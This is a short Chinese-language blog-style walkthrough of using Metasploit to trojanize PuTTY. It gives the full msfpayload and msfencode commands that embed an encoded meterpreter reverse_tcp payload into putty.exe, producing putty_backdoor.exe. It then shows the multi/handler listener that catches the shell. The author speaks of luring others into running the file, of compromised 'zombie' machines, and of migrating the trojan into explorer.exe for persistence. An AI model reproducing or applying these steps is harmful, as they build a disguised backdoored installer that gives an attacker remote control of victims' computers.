meterpreter号称是metasploit里面最牛逼的模块,今天我就使用了一下,下面记录一下过程。我这次试验的主要目的是,把能用的攻击载荷绑定到Putty程序上,当受攻击者打开Putty程序之后,我再通过命令将木马线程迁移到一个不会关闭的进程上,如explorer.exe.然后我就能保证木马进程持续不衰地为我服务了,至于怎么诱导人打开,还有怎么使用这个进程,这是后话,还需要进行后面命令的处理。我先记录目前完成的步骤。
-
首先,载入此次所需要用到的攻击载荷:
root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp O
在这里,要说明的是,我已经把putty.exe的文件拷入到/root/example_01下了(我这里改名为putty_02.exe,其实都一样)。而且操作也是在此文件夹下执行。
2.下一步就是要将攻击载荷植入这个putty_02.exe文件当中,这样它才能产生作用,在执行命令的同时,需要进行相关设置,以便于在执行之后,能向LHOST机器回传信息:
root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 R | msfencode -t exe -x /root/example_01/putty_02.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5
使用以上命令,设置攻击机为我的主机:192.168.17.135,使用端口为80,然后将植入后的文件生成为putty_backdoor.exe。
可见,执行成功,攻击载荷成功植入putty_backdoor.exe
将这个putty程序拷贝出虚拟机,然后具体怎么让别人使用,那就是后话了。
3.使用msfcli模式打开那个载荷的坚挺进程,等待有人上钩:
root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 E
此时,如果在某台肉鸡上面有人点击了你的putty程序,就会有如下状况:
4.至此,彻底进入meterpreter状态。可以利用后面的方法进行控制了。例如,输入shell.获取肉鸡控制。